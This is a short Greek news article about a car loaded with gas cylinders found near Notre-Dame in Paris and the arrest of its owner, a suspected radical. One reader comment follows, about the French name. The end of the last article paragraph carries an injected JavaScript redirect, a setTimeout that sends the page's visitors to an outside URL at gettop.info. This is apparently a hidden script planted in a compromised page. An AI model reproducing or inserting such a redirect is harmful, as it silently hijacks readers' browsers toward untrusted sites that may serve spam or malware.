Εντοπίστηκε αυτοκίνητο γεμάτο φιάλες υγραερίου κοντά στη Νοτρ-Νταμ

1
4

 

 

Αυτοκίνητο που περιείχε αρκετές φιάλες υγραερίου ανακαλύφθηκε κοντά στον καθεδρικό της Νοτρ-Νταμ στο κέντρο του Παρισιού το βράδυ του περασμένου Σαββάτου.

O ιδιοκτήτης του, που έχει τεθεί υπό κράτηση, είναι στον κατάλογο των υπηρεσιών πληροφοριών με τα πρόσωπα που θεωρούνται ύποπτα για θρησκευτικό ριζοσπαστισμό, δήλωσαν αστυνομικοί αξιωματούχοι.

Ένας αξιωματούχος δήλωσε πως τα φώτα κινδύνου ήταν αναμμένα όταν ανακαλύφθηκε και πως περιείχε επτά φιάλες υγραερίου, μία από τις οποίες ήταν κενή και ήταν τοποθετημένη στην θέση του συνοδηγού. Δεν υπήρχε πυροδοτικός μηχανισμός, δήλωσε ένας από τους αξιωματούχους.

Σύμφωνα με το Γαλλικό Πρακτορείο, η αστυνομία συνέλαβε σήμερα και ένα μέλος του περιβάλλοντος του ιδιοκτήτη του οχήματος, που είναι επίσης γνωστό στις υπηρεσίες της αστυνομίας. Ερευνα διεξάγεται από την εισαγγελία του Παρισιού, αρμόδια για υποθέσεις τρομοκρατίας. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

1 ΣΧΟΛΙΟ

  1. Γιατί «Νοτρ Νταμ» και όχι Παναγία των Παρισίων. Εφόσον η γαλλική λέξη μπορεί να αποδοθεί σαφώς στα ελληνικά υπάρχει λόγος να χρησιμοποιηθεί η γαλλική και μάλιστα με ελληνικούς χαρακτήρες; Σεβαστείτε τους αναγνώστες σας.

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here